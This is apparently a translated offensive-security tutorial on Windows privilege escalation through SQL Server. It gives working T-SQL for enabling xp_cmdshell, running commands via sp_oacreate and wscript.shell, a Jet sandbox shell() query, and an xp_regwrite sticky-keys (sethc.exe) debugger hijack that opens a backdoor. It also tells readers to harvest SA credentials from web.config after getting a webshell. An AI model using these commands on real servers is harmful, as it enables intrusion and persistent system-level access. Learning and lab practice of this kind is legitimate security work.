Windows privilege escalation-SQL Server/MSSQL database privilege escalation

Windows privilege escalation-SQL Server/MSSQL database privilege escalation

  • 1 Introduction
  • 2. Environment preparation
    • 2.1. Introduction to SQL Server
    • 2.2. SQL Server installation
      • 2.2.1. Main program installation steps
        • 2.2.1.1. Double-click SQL EXPR
        • 2.2.1.2. Instance configuration
        • 2.2.1.3. Server configuration
        • 2.2.1.4. Database Engine
        • 2.2.1.5. Installation complete
      • 2.2.2. Hypervisor Installation
        • 2.2.2.1. Installing plugins
        • 2.2.2.2. Installation
        • 2.2.2.3. Installation completed
      • 2.2.3. Hypervisor usage
        • 2.2.3.1. Initialization
    • 2.3. Environment configuration
      • 2.3.1. Restart the database
      • 2.3.2. Add SA user
      • 2.3.3. Setting Permissions
      • 2.3.4. Set Outlink
      • 2.3.5. Restart the database
      • 2.3.6. Test outreach
  • 3. Initial process
    • 3.1. Get SA account password
    • 3.2. Get outreach status
  • 4. SQL Server privilege escalation
    • 4.1. SQL Server privilege escalation method
    • 4.2. xp_cmdshell privilege escalation
      • 4.2.1. Get the status of xp_cmdshell
      • 4.2.2. Open xp_cmdshell
      • 4.2.3. Executing commands
    • 4.3. Sp_oacreate component privilege escalation
      • 4.3.1. Determine whether the component exists
      • 4.3.2. Determine whether the component is enabled
      • 4.3.3. Opening components
      • 4.3.4. Executing commands
      • 4.3.5. Check the effect
      • 4.3.6. Echo execution command
    • 4.4. Sandbox privilege escalation
      • 4.4.1. Manage Ad Hoc Distributed Queries
      • 4.4.2. Admin Sandbox Mode
      • 4.4.3. Description of sandbox mode
      • 4.4.4. Executing commands
    • 4.5. xp_regwrite privilege escalation
      • 4.5.1. Query whether xp_regwrite is enabled
      • 4.5.2. Enable xp_regwrite function
      • 4.5.3. Registry hijacking
      • 4.5.4. Check whether the hijacking is successful
      • 4.5.5. Test results
  • 5. Summary

1. Introduction

In the previous Windows privilege escalation-MySQL database privilege escalation, the privilege escalation of the database has been introduced. At the same time, in the Windows privilege escalation-overflow privilege escalation, the overall process and method of Windows privilege escalation are briefly introduced. Here I won’t go into details, and directly carry out Windows privilege escalation-the privilege escalation of SQL Server/MSSQL database.

SQL Server and MSSQL are actually the same thing, but they are called differently.

Windows Privilege Escalation-MySQL Database

Windows Privilege Escalation – Overflow Privilege Escalation

2. Environment preparation

Experimental environment: Windows system, SQL Server 2008 version

2.1. Introduction to SQL Server

Microsoft SQLServer is a powerful relational database management system in C/S mode, which has a wide range of applications, and can be seen everywhere from the background database of the website to some MIS (management information systems).

Choose two here, the first sqlexpr is the installation program, and the second managementstudio is the management program. Pay attention to see whether it is a 64-bit system or a 32-bit system.

At the same time, it is recommended to be connected to the Internet throughout the whole process. You may encounter some plug-ins that are not available, and they can be installed automatically during the network.

Download link: SQL Server Download

[External link picture transfer failed, the source site may have an anti-theft link mechanism, it is recommended to save the picture and upload it directly “>

2.2. SQL Server installation

2.2.1. Main program installation steps

Only the important ones are shown here, and you need to pay attention when installing. Other defaults are the next step, but it may be different during the installation process. different operations.

2.2.1.1. Double-click SQL EXPR

Double-click to open the SQL EXPR file, you need to wait for a while, and the following interface will appear. Click Install Fresh or Add Features to an Existing Installation.

2.2.1.2. Instance Configuration

The default here is to select the named instance, here we modify the default instance, and then go to the next step.

2.2.1.3. Server Configuration

Click “Use the same account for all SQL Server services”, and then select the system account.

2.2.1.4. Database Engine

Click “Add current user”, the current user will be added automatically, normally the current user will be selected by default on this page, and then the next step, there may be an error report here, don’t worry about it, just go to the next step.

2.2.1.5. Installation complete

The installation is complete here.

2.2.2. Hypervisor installation

The installation here is actually similar to the installation of the main program. The important ones will be shown here, and the unimportant ones will be the next step. The management program here is managementstudio.

2.2.2.1. Install plugin

On some computers, especially virtual machines, plug-ins may need to be installed, so why do you have to be connected to the Internet.

2.2.2.2. Installation

The same is true here, a new installation, and the follow-up basically keeps the default, which is the next step directly.

2.2.2.3. Installation complete

It’s all done here.

2.2.3. Hypervisor usage

Here, find SQL Server ManagementStudio in the start menu, and then you can open the management menu.

2.2.3.1. Initialization

After opening it for the first time, you need to simply configure the initialization state, and then click connect.

2.3. Environment Configuration

Here is our privilege escalation test, we also need a simple configuration.

2.3.1. Restart the database

Here we right-click the database on the page we just connected to, click “Properties”, after clicking in, click OK directly, no need to click other, and then restart the database.

2.3.2. Add SA user

Here, when using SQL Server to escalate privileges, it is necessary to obtain SA user permissions, so we first set up an SA user here.

Click “Security” “Login Name” to find “SA” and set the password of this user.

2.3.3. Setting permissions

Still in the setting page of the sa user, set the permissions, click the second attribute server roles (server roles) in the upper left corner, here are the roles you need to implement to add this user. Generally, we use the roles with the highest authority, one is public, and the other is sysadmin.

2.3.4. Setting up outreach

Set up the outreach here. We click on the last attribute, which is the status attribute (Status). In this status bar, we only need to check whether the upper column is allowed to connect to the database engine (Permission to connect to database engine) and select grant (award);

2.3.5. Restart the database

After everything is configured, restart the database, right click – restart the database.

2.3.6. Test outreach

Here you need to check whether the tcp/ip in the network configuration of the sql server configuration manager is enabled, and then use navicat to connect.

3. Initial process

The so-called initial process is that you need to obtain the SA account password of the database first, and then determine whether the port is a SQL Server database.

3.1. Get SA account password

After obtaining the webshell, you can try to find the password of sa in the directory of each site on the server (some sites directly use sa to connect to the database in the web application). In general, the connection string of the .net site database is in web.config or global .aspx may also be compiled in DLL files.

To be precise, obtaining the SA account password here means obtaining the SA management authority.

3.2. Obtain outreach status

It is better if you can connect to the outreach, if you can’t, you need to operate through the database management on the webshell, then the premise of this is to upload a later Trojan horse first. Of course, in the case of direct outreach, it is to ensure that you can correctly obtain the account password.

4. SQL Server privilege escalation

4.1. SQL Server privilege escalation method

  • xp_cmdshell privilege escalation
  • sp_oacerate privilege escalation
  • SQL Server sandbox privilege escalation
  • xp_regwritet privilege escalation

4.2. xp_cmdshell privilege escalation

xp_cmdshell can execute system commands. This component is disabled by default, so it needs to be enabled. xp_cmdshell is enabled by default in mssql2000, and disabled by default in versions after mssql2005. If the user has administrator sa authority, it can be re-opened with sp_configure.

If mssql is downgraded or other permissions are set, then we cannot elevate the permissions.

4.2.1. Get the status of xp_cmdshell

First of all, you need to get the status of xp_cmdshell, and check it through the command, it is in a prohibited state.

EXEC master.dbo.xp_cmdshell 'whoami'

4.2.2. Open xp_cmdshell

Here you can open xp_cmdshell by using the command.

Open:
exec sp_configure 'show advanced options',1;
reconfigure;
exec sp_configure 'xp_cmdshell',1;
reconfigure;

closure:   
exec sp_configure 'show advanced options', 1;
reconfigure;
exec sp_configure 'xp_cmdshell', 0;
reconfigure;

4.2.3. Executing commands

After the above program command is successfully executed, you can use the following command to execute the command, and all of them are executed with system authority.

EXEC master.dbo.xp_cmdshell 'whoami'

4.3. sp_oacreate component privilege escalation

When xp_cmdshell is deleted or cannot be used, you can consider using sp_oacreate. The premise of using it requires the server authority of the sqlserver sysadmin account to be system. sp_oacreate is a stored procedure that can delete, copy, and move files, and can also cooperate with sp_oamethod to write files and execute system commands.

4.3.1. Determine whether the component exists

Enter the following command, if the return is 1 to prove that the component exists, otherwise it does not exist.

select count(*) from master.dbo.sysobjects where xtype='x' and name='SP_OACREATE'

4.3.2. Determine whether the component is enabled

Through testing, it is found that the component is not turned on.

declare @shell int exec sp_oacreate 'wscript.shell',@shell output exec sp_oamethod @shell,'run',null,'c:\windows\system32\cmd.exe /c whoami >c:\1.txt'

4.3.3. Open component

Start the component by executing the following command.

Open:
EXEC sp_configure 'show advanced options', 1;
RECONFIGURE WITH OVERRIDE;
EXEC sp_configure 'Ole Automation Procedures', 1;
RECONFIGURE WITH OVERRIDE

closure:
EXEC sp_configure 'show advanced options', 1;
RECONFIGURE WITH OVERRIDE;
EXEC sp_configure 'Ole Automation Procedures', 0;
RECONFIGURE WITH OVERRIDE;

4.3.4. Executing commands

Execute the command that was not successfully executed before. It should be noted here that there is no echo when using the sp_oacreate component to escalate the privilege. It should be noted that the best way is to view the document records after uploading the webshell. If the C drive cannot be opened ( In the case of insufficient permissions), you can import the result file to a directory that you can open.

declare @shell int exec sp_oacreate 'wscript.shell',@shell output exec sp_oamethod @shell,'run',null,'c:\windows\system32\cmd.exe /c whoami >c:\1.txt'

4.3.5. Check the effect

Here we can check the effect of the execution. Of course, if you can execute the command, then basically the privilege escalation is the system command. If you are sure, just execute the command you want to execute, such as opening the remote desktop and adding users. etc.

4.3.6. Echo execution command

Here is also an article written by a big guy, which can realize the echo execution command.

sql server privilege escalation

declare @shell int, @exec int, @text int, @str varchar(8000)
exec sp_oacreate 'wscript.shell',@shell output
exec sp_oamethod @shell,'exec',@exec output,'C:\Windows\System32\cmd.exe /c whoami'
exec sp_oamethod @exec, 'StdOut', @text out
exec sp_oamethod @text, 'readall', @str out
select @str;

4.4. Sandbox privilege escalation

Sandbox mode is a security feature of the database. In sandbox mode, only expressions in control and field properties that are safe and free from malicious code are evaluated. An expression is considered safe if it does not use functions or properties that could corrupt data in some way. The premise of using it requires the server authority of the sqlserver sysadmin account to be system (sqlserver2019 is reduced to mssql by default), and the server has a jet.oledb.4.0 driver.

limitation:

  • Microsoft.jet.oledb.4.0 is generally only available on 32-bit operating systems
  • Windows 2008 and above have no Access database file by default, you need to upload it yourself
  • Ad Hoc Distributed Queries is disabled by default in sqlserver2015 and needs to be enabled.

4.4.1. Manage Ad Hoc Distributed Queries

Open:
exec sp_configure 'show advanced options',1;reconfigure;
exec sp_configure 'Ad Hoc Distributed Queries',1;reconfigure;

closure:
exec sp_configure 'show advanced options',1;reconfigure;
exec sp_configure 'Ad Hoc Distributed Queries',0;reconfigure;

4.4.2. Admin Sandbox Mode

Here I read other people’s articles, saying that the switch of the sandbox mode does not affect the operation of the command. Since it needs to be installed on a 32-bit system, I did not test it here.

Close:
exec master..xp_regwrite 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Jet\4.0\Engines','SandBoxMode','REG_DWORD',0;

recover:
exec master..xp_regwrite 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Jet\4.0\Engines','SandBoxMode','REG_DWORD',2;

4.4.3. Description of sandbox mode

 Sandbox mode SandBoxMode parameter meaning (default is 2)
0: disable safe mode in any owner
1: for only in the allowed range
2: Must be in access mode
3: fully open

View sandbox mode
exec master.dbo.xp_regread 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Jet\4.0\Engines', 'SandBoxMode'

4.4.4. Executing commands

Here, because 32-bit needs to be installed, 64-bit does not work, so no specific test is carried out. You can see that an error is reported here.

select * from openrowset('microsoft.jet.oledb.4.0',';database=c:\windows\system32\ias\ias.mdb','select shell(\ "cmd.exe /c whoami")')

4.5. xp_regwrite privilege escalation

Modify the registry by using the xp_regwrite stored procedure and replace it with any value, resulting in mirror hijacking. Of course, the prerequisite is that the registry editing (that is, the writing function) is not prohibited.

At the same time, if there is anti-software in this method, it may be directly intercepted, and the high probability is due to the trigger to modify the registry.

4.5.1. Query whether xp_regwrite is enabled

Check here whether it is enabled, if it is enabled, the output result is 1, otherwise it is enabled.

select count(*) from master.dbo.sysobjects where xtype='x' and name='xp_regwrite'

4.5.2. Enable xp_regwrite function

I have already enabled it here, and an error was reported. I tried to close it before, and it still seemed to report an error, but it seems to be enabled by default.

Open:
EXEC sp_configure 'show advanced options', 1;
RECONFIGURE;
EXEC sp_configure 'xp_regwrite',1;
RECONFIGURE;

closure:
EXEC sp_configure 'show advanced options', 1;
RECONFIGURE;
EXEC sp_configure 'xp_regwrite',0;
RECONFIGURE;

4.5.3. Registry hijacking

Use the regwrite function to modify the group registry for hijacking.

EXEC master..xp_regwrite @rootkey='HKEY_LOCAL_MACHINE',@key='SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\sethc.EXE',@value_name= 'Debugger',@type='REG_SZ',@value='c:\windows\system32\cmd.exe'

4.5.4. Check if the hijacking is successful

Then we check whether the hijacking is successful. You can see that cmd.exe is displayed below, which proves that the hijacking is successful.

exec master..xp_regread 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\sethc.exe','Debugger'

4.5.5. Test results

Here use remote desktop, or any other method, enter the interface where no password is entered, and then press shift 5 times to jump out of cmd.exe.

5. Summary

Finally, these methods of privilege escalation can basically be used on SQL Server2008 and previous versions and SQL Server2012, but some of them may not be available on 2016 or later versions, or SA permissions are too low , making it impossible to elevate rights.